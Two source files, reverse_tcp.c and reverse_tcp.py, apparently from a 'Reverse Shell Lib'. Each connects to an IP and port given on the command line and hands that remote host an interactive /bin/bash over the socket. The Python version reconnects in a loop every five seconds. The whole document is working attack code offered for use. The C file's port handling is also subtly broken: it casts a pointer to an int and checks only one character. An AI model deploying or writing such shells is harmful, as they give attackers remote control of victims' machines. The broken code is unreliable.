File: reverse_tcp.c
/*
    Copyright 2021 by Zackary Morvan, Cyber M Technologies.
    All rights reserved
    This file is part of the Reverse Shell Lib (RSL), and is released 
    under the "MIT License Agreement". Please see the LICENSE file that
    should have been included as a part of this package
*/

#include <stdio.h>
#include <stdbool.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <stdlib.h>
#include <unistd.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <string.h>
#include <ctype.h>

#define DELIM "."

bool is_valid_port(char *port){
    if (isdigit(*port)){
        int z = (int)(*port);
        if (z > 0 && z < 65556){
            return true;
        }
    }
    return false;
}

int main(int argc, char *argv[])
{

    if (argc < 3)
    {
        printf("Invalid arguments");
        return 0;
    }
    
    char *ipContender = argv[1];
    char *portContender = argv[2];
    int is_valid_ip = 1;
    if (is_valid_port(portContender) == true)
    {

            int port = (int)(portContender);
            char *ip = ipContender;

                struct sockaddr_in revsockaddr;

                int sockt = socket(AF_INET, SOCK_STREAM, 0);
                revsockaddr.sin_family = AF_INET;       
                revsockaddr.sin_port = htons(port);
                revsockaddr.sin_addr.s_addr = inet_addr(ip);

                connect(sockt, (struct sockaddr *) &revsockaddr, 
                sizeof(revsockaddr));
                dup2(sockt, 0);
                dup2(sockt, 1);
                dup2(sockt, 2);

                char * const argv[] = {"/bin/bash", NULL};
                execve("/bin/bash", argv, NULL);

                return 0;         
    }
    else
    {
            printf("Invalid port for payload");
            return 0;
    }
    
     
    
}

File: reverse_tcp.py
'''
    Copyright 2021 by Zackary Morvan, Cyber M Technologies.
    All rights reserved
    This file is part of the Reverse Shell Lib (RSL), and is released 
    under the "MIT License Agreement". Please see the LICENSE file that
    should have been included as a part of this package
'''

import socket
import os
import sys
import pty
import time

def checkIp(ip: str):
    try:
        socket.inet_aton(ip)
        return True
    except socket.error:
        return False

def checkPort(port: str):
    try:
        prt = int(port)
        if prt > 0 and prt < 65556:
            return True

    except ValueError:
        pass
    return False

class NetcatShell:
    def __init__(self, host, port):
        self.host = host
        self.port = port
        try:
            self.s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
            self.s.connect((self.host, self.port))
            self.reverse_shell()
        
        except:
            self.kill_connection()
            print("Payload listener unreachable . . .")
     
    def reverse_shell(self):
        os.dup2(self.s.fileno(),0)
        os.dup2(self.s.fileno(),1)
        os.dup2(self.s.fileno(),2)
        self.shell = pty.spawn('/bin/bash')
        os.wait()
        return

    def kill_connection(self):
        self.s.close()  
        return

if __name__ == "__main__":
    args = sys.argv
    error = ""
    if len(args) > 2:
        ip = args[1]
        port = args[2]
    else:
        ip = "127.0.0.1"
        port = 8080
    if checkIp(ip) is True:
        if checkPort(port) is True:
            port = int(port)
            while True:
                Shell = NetcatShell(ip, port)
                time.sleep(5)
        else:
            error = "Invalid port for payload"
    else:
        error = "Invalid ip address for payload"
    print(error)